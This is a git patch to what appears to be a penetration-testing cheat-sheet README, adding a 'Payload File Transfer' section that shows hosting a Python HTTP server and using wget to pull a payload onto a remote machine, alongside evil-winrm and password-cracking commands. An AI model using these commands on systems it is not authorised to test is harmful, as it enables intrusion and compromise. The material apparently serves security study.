From 5cd252274f45a077f294de0b3ee9aafdfdd4d1f7 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Sat, 30 Jul 2022 15:07:03 -0400
Subject: [PATCH] Update README.md
---
README.md | 61 +++++++++++++++++++++++++++++++++++++++++++------------
1 file changed, 48 insertions(+), 13 deletions(-)
diff --git a/README.md b/README.md
index 4273e4f..6aa761c 100644
--- a/README.md
+++ b/README.md
@@ -269,19 +269,6 @@ evil-winrm -i {IP ADDRESS} -u {USERNAME} -p {PASSWORD}
-
-# Reverse Shell
-
-## Linux
-
-## Windows
-
-# Privilege Escalation
-
-## Linux
-
-## Windows
-
# Password Cracking
***
@@ -309,3 +296,51 @@ john -w=/usr/share/wordlists/rockyou.txt {file.txt}
+# Payload File Transfer
+
+...
+
+## 1) Python Server
+
+
+
+**USAGE**
+
+
+
+```bash
+# Host a personal server on a specific port
+sudo python3 -m http.server {PORT}
+```
+## 2) WGET
+
+
+
+**USAGE**
+
+
+
+```bash
+# Download files on the remote machine
+wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
+
+# {IP ADDRESS}: Python Server IP Address
+# {FILE}: The payload to be trasnfered
+```
+
+
+# Privilege Escalation
+
+## Linux
+
+## Windows
+
+
+# Reverse Shell
+
+## Linux
+
+## Windows
+
+
+